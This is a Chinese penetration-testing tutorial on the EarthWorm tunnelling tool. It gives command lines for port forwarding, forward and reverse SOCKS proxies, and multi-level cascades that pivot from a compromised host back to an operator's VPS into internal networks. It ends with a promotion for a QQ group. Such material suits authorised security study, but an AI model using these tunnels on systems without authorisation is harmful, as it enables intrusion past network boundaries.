内网穿透-EW贯穿内网
Posted 李志宽
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了内网穿透-EW贯穿内网相关的知识,希望对你有一定的参考价值。
官网介绍啊:EW 是一套便携式的网络穿透工具,集socks代理和端口转发与一身,支持正向、反向、多级级联方式为我们打通隧道。而且支持多系统,可在复杂网络环境(win,linux,mac之间)完成网络穿透。
官网:http://rootkiter.com/EarthWorm/
这工具的代理借鉴了ssocks,端口转发是借鉴了Lcx工具的使用方法,今就详细研究研究一下这个工具
这里提一嘴啊,代理和端口转发不太一样
代理是我们可以使用它ip进行网络访问
端口转发是一个端口转到另一个端口,只能访问特定端口
-l 指定监听的本地端口
-d 指定反弹到的机器 ip
-e 指定反弹到的机器端口
-f 指定主动连接的机器 ip
-g 指定主动连接的机器端口端口转发
和lcx用法一个样,将本机8000端口,lcx_tran映射到本机(或目标)的3389端口
ew_win32.exe -s lcx_tran -l 8000 -f 127.0.0.1 -g 3389
或者使用lcx_listen和lcx_slave配合实现,访问1080转发的目标(本机)的3389
ew_win32.exe -s lcx_listen -l 1080 -e 8082
ew_win32.exe -s lcx_slave -d 127.0.0.1 -e 8082 -f 192.168.10.27 -g 3389
Socks代理
场景:我有台VPS(192.168.10.11),和已经拿下的目标主机(外网ip:180.180.180.1,内网ip:10.10.10.2),我想通过目标主机扫内网(10.10.10.0/24)
正向代理
将工具上传到目标主机,开通一个端口直接变成socks5代理服务器
ew_win32.exe -s ssocksd -l 8082
这样我们就设置浏览器代理,使用目标ip上网了,也可以访问内网段
反向代理
我VPS先开8082端口等待目标主机连接,然后vps开个8000端口当代理端口
ew_win32.exe -s rcsocks -l 8000 -e 8082
将工具上传目标主机,并反弹到VPS的8082端口
ew_win32.exe -s rssocks -d 192.168.10.11 -e 8082
我们就可以连接VPS的8080端口,使用目标ip(180.180.180.1)上网了,也可以访问内网10.10.10.0/24。
此时的目标机有流量经过
多级级联
场景:一台外网服务器A(202.202.101.101,192.168.10.2),内网主机B(192.168.10.3,10.10.10.5)和内网主机C(10.10.10.6)
AB主机之间互通,BC之间互通,AC之间不能连接,BC不能出网,尝试访问C主机
该工具能多级级联是因为,端口转发和代理服务直接可以互通,所以实现了强大的多层内网穿透功能
二级级联
方法a:
B主机先开8001端口等待正向连接
ew_win32.exe -s ssocksd -l 8001A主机使用端口映射,将A的1080端口映射到B的8001端口
ew_win32.exe -s lcx_tran -l 1080 -f 192.168.10.3 -g 8001这样我们连接A主机的1080端口,就可以访问C主机了
方法b:
A主机监听1080和8080,然后A的8080端口转发到B的8001端口
ew_win32.exe -s lcx_listen -l 1080 -e 8080
ew_win32.exe -s lcx_slave -d 127.0.0.1 -e 8080 -f 192.168.10.3 -g 8001主机B监听自身8001端口转为socks服务
ew_win32.exe -s ssocksd -l 8001
三级级联
场景:添加一台主机D,只能C主机访问D主机10.10.30.5
C主机先开8001端口等待正向连接
ew_win32.exe -s ssocksd -l 8001B主机设置端口转发,起到中间隧道作用
ew_win32.exe -s lcx_slave -d 192.168.10.2 -e 7000 -f 10.10.10.6 -g 8081A主机使用监听7000等待端口连接
ew_win32.exe -s lcx_listen -l 1080 -e 7000
或
ew_win32.exe -s rcsocks -l 1080 -e 7000这样我们连接A主机的1080端口,就可以访问D主机了
再换个方法:
C主机反向连接B主机的8081
ew_win32.exe rssocks -d 10.10.10.5 -e 8081B主机监听8081端口等待C主机反弹,将8080和8081打通隧道,然后连接A主机的7000并转发到B的8080
ew_win32.exe -s lcx_listen -l 8080 -e 8081
ew_win32.exe -s lcx_slave -d 192.168.10.2 -e 7000 -f 127.0.0.1 -g 8080A主机将监听7000端口等待B主机连接
ew_win32.exe -s rcsocks -l 1080 -e 7000这样我们连接A主机的1080即可访问D主机了
再多级就是在添加B主机的相同操作在中间当隧道即可
可惜
这款工具是用的非常舒服的一个、但是种种原因,已被停更和查杀了。
看到这里的大佬,动动发财的小手 点赞 + 回复 + 收藏,能【 关注 】一波就更好了
我是一名渗透测试工程师,为了感谢读者们,我想把我收藏的一些网络安全/渗透测试学习干货贡献给大家,回馈每一个读者,希望能帮到你们。
干货主要有:
① 2000多本网安必看电子书(主流和经典的书籍应该都有了)
② php标准库资料(最全中文版)
③ 项目源码(四五十个有趣且经典的练手项目及源码)
④ 网络安全基础入门、Linux运维,web安全、渗透测试方面的视频(适合小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ 渗透测试工具大全
⑦ 2021网络安全/Web安全/渗透测试工程师面试手册大全
各位朋友们可以关注+评论一波 然后加下QQ群:581499282 备注:CSDN 联系管理大大即可免费获取全部资料
以上是关于内网穿透-EW贯穿内网的主要内容,如果未能解决你的问题,请参考以下文章